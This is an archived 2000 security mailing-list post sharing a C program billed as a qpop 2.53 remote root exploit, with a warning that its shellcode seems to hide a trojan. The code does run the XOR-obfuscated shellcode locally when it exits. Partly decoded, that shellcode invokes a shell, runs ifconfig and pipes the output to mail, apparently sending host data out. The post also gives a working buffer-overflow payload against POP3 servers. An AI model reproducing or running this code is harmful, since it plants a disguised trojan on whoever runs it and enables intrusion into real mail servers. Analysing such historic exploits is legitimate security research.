Vulnerability Development mailing list archives
QPOP2.5* exploit ??
From: batrox () SWBELL NET (Ryan Sweat)
Date: Sun, 14 May 2000 12:30:03 -0500
this has been found in the wild, however there seems to be a trojan in the shellcode. Popper 2.5* has been thought to be safe. I would not reccomend running this on your own machine unless you crack the shellcode and see what it does. bat /* PRIVATE!!!!!!!!! DONT DISTRIBUTE!!!!! PRIVATE!!!!!!!!! * * * qpop 2.53 remote root exploit for linux * tested on redhat 6.x and 5.x, and slack7 * offsets for redhat 6: 100 * redhat 5: 150 * * slackware: 200 * * these offsets were an average, however the buffer is small and * the address must almost be exact. Perhaps try a offset brute forcer. * * code by John Slockavich, copyright Febuary 25th, 2000 * this code for educational purposes only * * * * If this exploit is successful, you should have a bindshell on port 1524 */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <signal.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #include <netinet/in.h> #include <arpa/inet.h> #include <linux/tcp.h> #include <linux/ip.h> #define RET 0xbffff6b2 #define NOP 0x90 #define PORT 110 #define BSIZE 512 int (*qpop_proc)(); void quit(int x); char shellcode[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9\x8c\x01\x8 0\x36\x02\x46\xe2\xfa" "\xeb\x33\x03\x02\x02\x2d\x60\x6b\x6c\x2d\x71\x6a\x02\x2f" "\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x2d" "\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f\x63\x22\x7e\x22" "\x6f\x63\x6b\x6e\x22\x2f\x71\x22\x71\x6d\x6e\x75\x63\x70\x22\x67\x76\x61\x6d" "\x75\x6c\x78\x42\x6a\x6d\x76\x6f\x63\x6b\x6e\x2c\x61\x6d\x6f\x22\x3c\x3c\x22" "\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x22\x67\x61\x6a\x6d\x22\x25\x29\x22" "\x29\x25\x22\x3c\x3c\x22\x7c\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71\x76\x71" "\x39\x22\x70\x61\x72\x22\x6e\x72\x42\x71\x69\x6b\x6c\x6c\x67\x70\x2c\x76\x70" "\x66\x6e\x6c\x69\x2c\x61\x6d\x6f\x38\x2d\x77\x71\x70\x2d\x71\x72\x6d\x6d\x6e" "\x2d\x6e\x72\x2d\x6f\x6d\x66\x67\x6e\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63" "\x70\x22\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63\x70\x39\x22\x76\x63\x70\x22\x2f" "\x7a\x74\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x22\x3c\x3c\x22\x2d\x66\x67\x74" "\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x71\x6d\x6e\x75\x63\x70\x39\x22\x61" "\x6a\x6f\x6d\x66\x22\x29\x7a\x22\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x39\x22" "\x2c\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x22\x3c\x3c\x22\x2d\x66\x67\x74" "\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x2c\x2c\x39\x22\x70\x6f\x22\x2f\x70" "\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x39\x02\x83\xee\x65\x29\x02\x02\x57\x8b" "\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83\xc1\xb5\x12\x02\x02\x8f" "\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd\xfd\x8b\x47\xf6\x8f\x81" "\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02\x02\x8f\x4f\xf2\xba\x09" "\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f\x67\xea\x59\x5c\xcb\xc1" "\x92\x92"; void usage(char *name) { fprintf(stderr,"qpop 2.53 exploit by John Slockavich\n" "Usage: %s <hostname> <offset>\n" , name); exit(1); } int main(int argc, char **argv) { struct sockaddr_in sin; struct hostent *he; char *hostname, *ptr, *buff; char sendbuf[BSIZE+20]; long *addr_ptr, addr; int rfd; int sfd; int i; int offset = 0; if (argc < 2) usage(argv[0]); hostname = argv[1]; if (argv[2]) offset = atoi(argv[2]); (char *)qpop_proc = shellcode; if (!(buff = malloc(BSIZE))) { perror("malloc"); exit(0); } sin.sin_family = AF_INET; sin.sin_port = htons(PORT); if ((he = gethostbyname(hostname)) == NULL) { herror("resolve"); exit(0); } bcopy(he->h_addr, (struct in_addr *)&sin.sin_addr, he->h_length); if ((rfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) { perror("socket"); exit(1); } if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); } addr = RET - offset; printf("preparing buffer using addr 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < BSIZE; i+=4) *(addr_ptr++) = addr; for (i = 0; i < BSIZE/2; i++) buff[i] = NOP; ptr = buff + ((BSIZE/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[BSIZE - 1] = '\0'; if (connect(sfd, (struct sockaddr *)&sin, sizeof(sin)) < 0) { perror("connect"); quit(1); } printf("connected, sending shellcode...\n"); snprintf(sendbuf, sizeof(sendbuf)-1,"USER %s\n",buff); if (write(sfd, sendbuf, strlen(sendbuf)) < 0) { perror("write"); quit(1); } close(sfd); quit(0); } void quit(int x) { qpop_proc(); exit(x); }
Current thread:
- Re: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Knud Erik Højgaard (Apr 14)
- <Possible follow-ups>
- Re: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Harmer, Mike (May 12)
- regarding phrack49's stack smashing tutorial Christian Hammers (May 13)
- Re: regarding phrack49's stack smashing tutorial Precious Roy (May 13)
- Re: regarding phrack49's stack smashing tutorial Bluefish (May 13)
- QPOP2.5* exploit ?? Ryan Sweat (May 14)
- Re: QPOP2.5* exploit ?? H D Moore (May 14)
- Re: QPOP2.5* exploit ?? jms (May 13)
- Napster Fix optik (May 14)
- Re: QPOP2.5* exploit ?? Maurycy Prodeus (May 15)
- Re: QPOP2.5* exploit ?? jms (May 14)
- Re: QPOP2.5* exploit ?? Eric LeBlanc (May 15)
- regarding phrack49's stack smashing tutorial Christian Hammers (May 13)
- hi sparc qpop info sp00n () GMX DE (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? Dimitry Andric (May 14)